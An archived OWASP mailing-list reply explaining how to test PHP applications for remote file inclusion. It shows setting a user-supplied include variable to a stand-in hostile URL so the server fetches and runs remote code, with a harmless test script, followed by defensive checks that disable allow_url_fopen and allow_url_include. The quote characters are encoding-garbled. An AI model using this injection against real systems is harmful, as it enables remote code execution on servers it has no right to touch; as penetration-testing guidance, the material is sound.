[Owasp-testing] Remote File include vulnerability

Andrew van der Stock vanderaj at owasp.org
Tue Apr 10 13:29:32 EDT 2007


Hi there,

You will generally find a construct like this:

require ($foo.¹.inc.php¹);

To obviate this, you need to do two things:

Install a file somewhere on the Internet or on your computer if you¹re
testing locally (recommended). I like

<?php
echo "pwned";
exit;
?>

Change the variable, foo, to point at your script. If $foo is from a
variable from the user, like foo in the post, get or cookie collection, you
need something like a browser or at worst, Firefox Web Developer toolbar or
WebScarab to modify the contents of foo to:

http://www.example.com/hostile.php?dummy=

That way, your script is called like this:

http://www.example.com/hostile.php?dummy=.inc.php

The PHP interpreter (which will almost always have allow_url_fopen turned on
­ STUPID!, STUPID!, STUPID! A friendly message to our PHP developer friends)
will then retrieve, tokenize and execute your script as if it were local to
the file system.

My view is that scripts should have the following code before any include /
require statements and definitely before any file or stream operations:

if ( ini_get(Œallow_url_fopen¹) == ³1² &&
        @ini_set(Œallow_url_fopen¹, Œ0¹) === false ) {
    die ³Cannot continue ­ allow_url_fopen is set to 1, which is extremely
dangerous. Disable this in php.ini before continuing²;
}
// PHP 5.2.0 and later
if ( ini_get(Œallow_url_include¹) == ³1² &&
        @ini_set(Œallow_url_include¹, Œ0¹) === false ) {
    die ³Cannot continue ­ allow_url_fopen is set to 1, which is extremely
dangerous. Disable this in php.ini before continuing²;
}

Andrew
 


On 4/10/07 12:45 PM, "Denise Spiteri" <denise.spi at gmail.com> wrote:

> Hi to all, 
>  
>             Can someone please tell me, how to carry out penetration testing
> for Remote File Include Vulnerability?
>  
> Denise
>  
> 
> 
> _______________________________________________
> Owasp-testing mailing list
> Owasp-testing at lists.owasp.org
> http://lists.owasp.org/mailman/listinfo/owasp-testing





More information about the Owasp-testing mailing list